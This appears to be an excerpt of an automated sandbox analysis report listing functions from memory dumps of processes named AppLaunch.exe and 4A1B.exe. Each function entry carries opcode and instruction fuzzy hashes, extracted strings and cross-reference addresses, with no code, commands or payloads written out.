Opcode Fuzzy Hash: 5d2e2b23c5bbd518f07a4257b4bc64132674c525285f015358f35fa995dce35a
Instruction Fuzzy Hash: 7C2103B2500240EFDF05DF58D9C4B26BFA5FB88314F24C6A9E9094B256C33AD816CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0099D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2378479896.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_99d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b6aa5aa0b58e4710ed6322a7cad88a9c87617ce317a37b895e83fd6be14feab
Instruction ID: 274e8347ba2907a45ed7f91576cebfb518003997d66e445ce6860a827846edbe
Opcode Fuzzy Hash: 1b6aa5aa0b58e4710ed6322a7cad88a9c87617ce317a37b895e83fd6be14feab
Instruction Fuzzy Hash: C4210771505240DFDF05DF18DAC0B27BF69FB98318F24C569E9094B25AC33AD856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 009AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2378560860.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9ad000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8688b6d1bb265ec5e894305ac82a5267b9aa4670205e36540fd2b79f058de38
Instruction ID: ee59b1662560ed6ea5d6dac4851a993d6a4b1ac2dc4d555adbdf9e69809ff9d7
Opcode Fuzzy Hash: f8688b6d1bb265ec5e894305ac82a5267b9aa4670205e36540fd2b79f058de38
Instruction Fuzzy Hash: BA210171604200DFDB14DF24D9C4B26BFA9FB89314F20C96DE84A4B696C33AD847CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 009AD006 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2378560860.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_9ad000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08326087679268f74b772f660eaddf111b25830383a7e542762191ce23e02e08
Instruction ID: b21cd3a0a6cdfe3e97ccb61e0a5ef24a1599f37063f5a5c35868a2eab6831c79
Opcode Fuzzy Hash: 08326087679268f74b772f660eaddf111b25830383a7e542762191ce23e02e08
Instruction Fuzzy Hash: 4D2181755093808FDB16CF24D994715BF71EB46314F28C59AD8498B697C33A980ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0099D76F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2378479896.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_99d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
Instruction ID: 69e89ed8d80d9213f8f9731255f0fc4b586e9b2a8a846b13c6b8e282cba6ec81
Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
Instruction Fuzzy Hash: A0219D76504280DFCF16CF14D9C4B16BF72FB98314F24C6A9D9490A256C33AD826CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0099D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2378479896.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_99d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 8e9f4ee7d14485ab9c6711110fc84f78768efe97bf749ea0143a3bb3ac5d22b4
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: C111D376504280CFDF16CF14D5C4B16BF71FB94318F24C6A9E8494B65AC336D85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0099DA81 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2378479896.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_99d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33ad92f7897303d2c2d204cd79a11caaffebc870adc2cfc68ca79058eb9979ce
Instruction ID: a0853dce2c7fe75e05152601eaa491369125b025ad896363f1fba0d1d1773d3e
Opcode Fuzzy Hash: 33ad92f7897303d2c2d204cd79a11caaffebc870adc2cfc68ca79058eb9979ce
Instruction Fuzzy Hash: 0701A27110F3449AEB108A6ECAC4767BFDCEF51364F18C96AED094A286C279DC40C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0099DA80 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2378479896.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_99d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ffad8a71d80a75c5d89371000021b68d30fa828ea63889f8ef978f2bcb4fc31
Instruction ID: ae6d15895a36e8fb058f8747738a6c787b6509c73412d5fd1996819a993fb95d
Opcode Fuzzy Hash: 8ffad8a71d80a75c5d89371000021b68d30fa828ea63889f8ef978f2bcb4fc31
Instruction Fuzzy Hash: 27F0627140A3449EEB108A1EC9C4B63FFECEB51774F18C45AED484E286C2799C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00D830FA Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2379755556.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d80000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd79fb2388459df2bf076f2b84e58c87530dffa3b1d2a97c75f89ab187ed8867
Instruction ID: f7b4e52fad72473b8f01e24db5aead09e2dff068bf7651e67cb1ccc545ed5657
Opcode Fuzzy Hash: cd79fb2388459df2bf076f2b84e58c87530dffa3b1d2a97c75f89ab187ed8867
Instruction Fuzzy Hash: 82E09A30C4620EDFDB10EF90C00A7FFF670BB41B05F602449884973280DB708B488B66

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 4A1B.exePID: 6948, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	15
Total number of Limit Nodes:	1

Executed Functions

Function 097EA680 Relevance: 20.6, Strings: 16, Instructions: 567
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4c^q, xrefs: 097EAFB9
4c^q, xrefs: 097EAFAF
$^q, xrefs: 097EB327
$^q, xrefs: 097EB1F5
4'^q, xrefs: 097EB336
LR^q, xrefs: 097EA8ED
$^q, xrefs: 097EB198
Hbq, xrefs: 097EACCC
Hbq, xrefs: 097EAD44
Hbq, xrefs: 097EA8A4
Hbq, xrefs: 097EAC9B
c^q, xrefs: 097EA809
Hbq, xrefs: 097EAD13
$^q, xrefs: 097EB1E5
4c^q, xrefs: 097EAF9D
4|cq, xrefs: 097EB72D

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: 4'^q$4c^q$4c^q$4c^q$4|cq$Hbq$Hbq$Hbq$Hbq$Hbq$LR^q$$^q$$^q$$^q$$^q$c^q
API String ID: 0-1794728347
Opcode ID: 3ca63388426dd5bf0bd68d489c1e2c2eeb1336ec352b31ce8c040e97a880c76b
Instruction ID: 64afa8cad4abb7d747a75db42be41cdc9bdbc9ad4952e04142457aab87bd217e
Opcode Fuzzy Hash: 3ca63388426dd5bf0bd68d489c1e2c2eeb1336ec352b31ce8c040e97a880c76b
Instruction Fuzzy Hash: E712B132B042558BCB199B79C45037EBBE6AF89340F14846AE446DB391EB38DD46C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 097E6F78 Relevance: 17.4, Strings: 13, Instructions: 1186COMMON

Download Yara Rule

Strings

c^q, xrefs: 097E7946
Nv]q, xrefs: 097E7280
(_^q, xrefs: 097E7A14
c^q, xrefs: 097E792C
Hbq, xrefs: 097E7D32
$^q, xrefs: 097E7603
4c^q, xrefs: 097E78F2
4c^q, xrefs: 097E790C
TA, xrefs: 097E7FA9
,bq, xrefs: 097E7B97
$^q, xrefs: 097E7F9B
$^q, xrefs: 097E761D
(_^q, xrefs: 097E7A2E

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: (_^q$(_^q$,bq$4c^q$4c^q$Hbq$Nv]q$TA$$^q$$^q$$^q$c^q$c^q
API String ID: 0-1593493225
Opcode ID: 266c46f2d78982b8fc826249f6a172f740d908e2b666887bd3bb2e51254be6b1
Instruction ID: 9bd8e627b76982bcad98a28d7cb6a4f97cd8662dd7e3784d701b5cb3036a8f2c
Opcode Fuzzy Hash: 266c46f2d78982b8fc826249f6a172f740d908e2b666887bd3bb2e51254be6b1
Instruction Fuzzy Hash: DB826371B801184FCB6DAB7D445066D6AE3BFCC740F2048AED51ADB394EE35DC868B92

Uniqueness

Uniqueness Score: -1.00%

Function 097E0D18 Relevance: 6.6, Strings: 5, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 097E10C8
Hbq, xrefs: 097E11B8
Hbq, xrefs: 097E10F9
Hbq, xrefs: 097E112A
Hbq, xrefs: 097E1171

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$Hbq$Hbq
API String ID: 0-1677660839
Opcode ID: ffe2d887be5c6695be6b5c8a51725345b78a92654e2f846919d8da54b4f8e304
Instruction ID: c81b8e846721b33311240649b5e1d93035e52e105c4967bf52424621fa3d3592
Opcode Fuzzy Hash: ffe2d887be5c6695be6b5c8a51725345b78a92654e2f846919d8da54b4f8e304
Instruction Fuzzy Hash: 55F1A372E14256CBCB25DF74C4502BDFBB2FF89300F24C66AE445AB241DB749A85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 097EAD88 Relevance: 4.3, Strings: 3, Instructions: 538
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 097EB327
$^q, xrefs: 097EAF7D
4|cq, xrefs: 097EB72D

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: 4|cq$$^q$$^q
API String ID: 0-2405269640
Opcode ID: d0ecbf1b211fb4dcdf98079baf64b23166ad58a41ada34a3f688add644ac7778
Instruction ID: 6016b921245ee6827671729d14fe2cdcdb1eaf257e42213e0f06792b1fe1ed23
Opcode Fuzzy Hash: d0ecbf1b211fb4dcdf98079baf64b23166ad58a41ada34a3f688add644ac7778
Instruction Fuzzy Hash: 7E126C31B002198FDB19DF7AC8546AEBBB6BF89300F14846AE419DB365DF349C42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 097ECE78 Relevance: 1.1, Instructions: 1106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a067465685abe601d62b0406511b25534200b8482f3d0381dc942b6b2527ea
Instruction ID: 3c34089100c0c458dd24dcadc5f8e9b05be2740d43d0cb9b2f5feb8b1a75c4c6
Opcode Fuzzy Hash: 06a067465685abe601d62b0406511b25534200b8482f3d0381dc942b6b2527ea
Instruction Fuzzy Hash: 1EB2A375A01219CFDB64DF68C984B9DBBB1BF4D304F1482A9E809AB356D730AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 097EE9E0 Relevance: 1.0, Instructions: 1003COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 157a270d4b671d69b7df263ce3cb2d3f601a33fcab564b4aaedc4d87c44c692a
Instruction ID: a27f7d16d884470aa5ce5bee7ccf3640d31f6ed3c8f755acdda9c75103beda26
Opcode Fuzzy Hash: 157a270d4b671d69b7df263ce3cb2d3f601a33fcab564b4aaedc4d87c44c692a
Instruction Fuzzy Hash: F1A2A375E002298FDB64DF69C984BDDB7B2BF49300F1481A5E909AB355DB30AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 097E1E68 Relevance: .8, Instructions: 814COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7bd790c5c3b74ca8e803691edb39e0ee79f1d42037781b0cff0fa531f801357
Instruction ID: 490e0fdd0dc785d503508ad5eb338ce0e3f22161fd9afb0334581efbb6964ab5
Opcode Fuzzy Hash: f7bd790c5c3b74ca8e803691edb39e0ee79f1d42037781b0cff0fa531f801357
Instruction Fuzzy Hash: 9C825A79600256CFDB24CF28D848B6D77B9BF49308F1041E8D9199B3A6EB349D49CF92

Uniqueness

Uniqueness Score: -1.00%

Function 097EE4E8 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76282bd4fac6765dfe82c6a42828c15ac4f2f83eb105869d529e66d33b255eb3
Instruction ID: a8866c764826b9c6d9fe9bebd90446a4f9528de1e5d965d75055b92180495ad7
Opcode Fuzzy Hash: 76282bd4fac6765dfe82c6a42828c15ac4f2f83eb105869d529e66d33b255eb3
Instruction Fuzzy Hash: 2EE1D474E01218CFDB14DFA9D884A9DFBB2FF48310F2496A9E418AB355DB31A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 097E08B0 Relevance: 6.4, Strings: 5, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 097E08F8
(br, xrefs: 097E0982
Hbq, xrefs: 097E0A19
Hbq, xrefs: 097E0924
<dr, xrefs: 097E098E

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: (br$(bq$<dr$Hbq$Hbq
API String ID: 0-2014436266
Opcode ID: fedca0faafaf617f9d02109d123b5a3864016d030b997c608595b099fbe98e1f
Instruction ID: e6998446eaf9465ae467f5d697a1006943aced1d48d1e098935348570a3de559
Opcode Fuzzy Hash: fedca0faafaf617f9d02109d123b5a3864016d030b997c608595b099fbe98e1f
Instruction Fuzzy Hash: 1341E031B042589FC714EF79C85456E7BF6FF89240B14856AD40ADB351DF389D0ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 097E1768 Relevance: 4.0, Strings: 3, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 097E1778
Hbq, xrefs: 097E18B9
Hbq, xrefs: 097E198D

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$LR^q
API String ID: 0-2893092976
Opcode ID: a84ddc5e37a2169d9944c62400a71b64c561b1c18b2b3bc5a34e382f9855e63e
Instruction ID: 5d94d1547f770f3dc867de1a22b725523b9731176183b39b9589082eb57a2c02
Opcode Fuzzy Hash: a84ddc5e37a2169d9944c62400a71b64c561b1c18b2b3bc5a34e382f9855e63e
Instruction Fuzzy Hash: 69713732B082A68FDB198F75C4523BE7BE2AF8E350F54447AE855CB281EB34C901C795

Uniqueness

Uniqueness Score: -1.00%

Function 097E1737 Relevance: 3.9, Strings: 3, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 097E1778
arU, xrefs: 097E1764
Hbq, xrefs: 097E18B9

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: Hbq$LR^q$arU
API String ID: 0-2093403205
Opcode ID: fae32af0b369c22c183b107f27c3ac8c904ffdd90b3ab92e2d72da86bb2898aa
Instruction ID: 6bb24a46bb3028e03c939d14ced6598ef35e9ce359165a6d4d8b1ee446dbf67e
Opcode Fuzzy Hash: fae32af0b369c22c183b107f27c3ac8c904ffdd90b3ab92e2d72da86bb2898aa
Instruction Fuzzy Hash: 58312232B082919FC70A5F7488167BE7BA2AF8A340F5444BEE881CB241EB358901C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 097E59B0 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xbq, xrefs: 097E5A6D
xbq, xrefs: 097E5A91

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: xbq$xbq
API String ID: 0-4275011135
Opcode ID: 58b05f52322e02ad1cf64932486153c7ae4198aad9550961bd08d4c77305a816
Instruction ID: 6fb0e629fa789c506ead232c1fffe0020671071eb271593981a0c3c3598f7e7e
Opcode Fuzzy Hash: 58b05f52322e02ad1cf64932486153c7ae4198aad9550961bd08d4c77305a816
Instruction Fuzzy Hash: 4051B1306003458FCB06AF39D95459EBBA2FF81304B008A7ED1468B369EF75AD4ACBC1

Uniqueness

Uniqueness Score: -1.00%

Function 097E9191 Relevance: 2.6, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 097E91C9
$^q, xrefs: 097E91BD

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: bcb7c2f51d9826b8cb400b5c5c11d7373660dd09624eca391106b3c86c6d747b
Instruction ID: d1b81a18c5920b1527bfba7a36fc8b4ad60472ba924e7a0a6fed3f54a47311d0
Opcode Fuzzy Hash: bcb7c2f51d9826b8cb400b5c5c11d7373660dd09624eca391106b3c86c6d747b
Instruction Fuzzy Hash: C3115532B00B544FD728CA28900476EBBE1AFC6354F04407FCD43CB396DBB1A9058792

Uniqueness

Uniqueness Score: -1.00%

Function 01776EA8 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01778A59

Memory Dump Source

Source File: 0000000A.00000002.2390772263.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1770000_4A1B.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0b1cd4331ad2fe6243e2e67d62bcf2c02dca0b17f3a93039ce7b975eb1de0720
Instruction ID: b46ff36a3a0ac8a2aae3f9a1444342bef1ff8d767e38bde5d3f5a029df0707ac
Opcode Fuzzy Hash: 0b1cd4331ad2fe6243e2e67d62bcf2c02dca0b17f3a93039ce7b975eb1de0720
Instruction Fuzzy Hash: 8C41C2B0C0071DCBDB24DFAAC94479EFBB5BF45304F24806AD408AB255DB755946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0177899D Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01778A59

Memory Dump Source

Source File: 0000000A.00000002.2390772263.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1770000_4A1B.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 800e9ddf867b0f374a7f1ce88458c5e8ca8143cab046009f0d8ffd854362120c
Instruction ID: ac995742641b2e4276e48a53cf91d376ae9c619da7d5de4f3f24edf956192ceb
Opcode Fuzzy Hash: 800e9ddf867b0f374a7f1ce88458c5e8ca8143cab046009f0d8ffd854362120c
Instruction Fuzzy Hash: 3541E1B0C00719CFDB24DFAAC94478DFBB5BF49304F24806AD818AB255DB756986CF91

Uniqueness

Uniqueness Score: -1.00%

Function 097E0A58 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

Hbq, xrefs: 097E0B4E

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: da97ba504de2ef386a7a724b378703d03b767d5a7a2e24d65d79126ff091cc8e
Instruction ID: ad0d1794d3e6c81aff01a3db9922fb153a1458ce8fff83e440a24b769d5c65ab
Opcode Fuzzy Hash: da97ba504de2ef386a7a724b378703d03b767d5a7a2e24d65d79126ff091cc8e
Instruction Fuzzy Hash: 2441D236B18285CFCB65DF34D84866D7BF6FF8934070480AAE01ACB291EB74DA05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 097E5C47 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

a^q, xrefs: 097E5CEE

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: a^q
API String ID: 0-3411664965
Opcode ID: 55f003ccc24e0390ed3ad6aedb3860007d52a740088ea26d6c7e3da886f52b91
Instruction ID: cbac15cd755ac507997aec4d21fc8f828cee0fd4a185e3da31c0b3d11d357c84
Opcode Fuzzy Hash: 55f003ccc24e0390ed3ad6aedb3860007d52a740088ea26d6c7e3da886f52b91
Instruction Fuzzy Hash: 38219E30610B059FC319DF39C54065AFBE6FF85204B44CA6ED04A9B265EF71E94ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 097E3821 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

4'^q, xrefs: 097E38D8

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: c824bef4a2b740ea90cf859187e76b599226f59b8338c60cad94ca3e41228a1f
Instruction ID: 289583ad5a726ea4513b5678d55dbf55cf8c1ff8a387333bd2e6c745c5831f9a
Opcode Fuzzy Hash: c824bef4a2b740ea90cf859187e76b599226f59b8338c60cad94ca3e41228a1f
Instruction Fuzzy Hash: 6E318E349002498FCB09EB68E854B9EBBB2FF45305F1085ADD605DB3A9DB355D49CB81

Uniqueness

Uniqueness Score: -1.00%

Function 097E5C58 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

a^q, xrefs: 097E5CEE

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: a^q
API String ID: 0-3411664965
Opcode ID: 7bedc24afe2c4c07220701f6b60a4b119e8ebf8d86d0ce0dab611098e75a9438
Instruction ID: 1f2e13c7eb98e7f272f777cdbbd41ef32f8834ed6b2d9dc49fe212729366770b
Opcode Fuzzy Hash: 7bedc24afe2c4c07220701f6b60a4b119e8ebf8d86d0ce0dab611098e75a9438
Instruction Fuzzy Hash: 2C216231610B059FC318EF2AC54095AFBE6FFD5204B44CA3DD14A9B225EF70E9498B91

Uniqueness

Uniqueness Score: -1.00%

Function 097E3951 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

$^q, xrefs: 097E3992

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: ba4ba3da4adab5ef1537324eb8d726adab55a49e58830f96980691165c5c3b1e
Instruction ID: c58e9c2dd00702712d0b5f50b52751b3bb8180226b1d193ab158e2bac853cc8a
Opcode Fuzzy Hash: ba4ba3da4adab5ef1537324eb8d726adab55a49e58830f96980691165c5c3b1e
Instruction Fuzzy Hash: 11218E357102458FCB19DB3AE84896A7BBAFF8931A70041AEF609CB365DB329C01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 097E3830 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

4'^q, xrefs: 097E38D8

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: e65818c0adf9ac4def2abea7bad64907bc20bbf6f582c4c2b81e0536aacebcb5
Instruction ID: 70ca880ea78a0676e54c5710bdf68b99800069c95af8aafa8113f4cfed665a2a
Opcode Fuzzy Hash: e65818c0adf9ac4def2abea7bad64907bc20bbf6f582c4c2b81e0536aacebcb5
Instruction Fuzzy Hash: 23217134900249DFCB08EF69E854B9EBBB2FF44305F1089A9D205973A8DF755D45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 097E1E58 Relevance: .8, Instructions: 750COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa9edbbdcc9571aed753c51dea5dae3d9ff7b5191f09800827abb022774cf1aa
Instruction ID: 5f5770d7df91662c4c7935657ed1b6d326677bbc5e62205eac61a653a780fb2b
Opcode Fuzzy Hash: aa9edbbdcc9571aed753c51dea5dae3d9ff7b5191f09800827abb022774cf1aa
Instruction Fuzzy Hash: 83727B79600256CFDB24CF28D848B6977B9FF49318F1041E8DA199B366E7349C89CF92

Uniqueness

Uniqueness Score: -1.00%

Function 097E6C9D Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
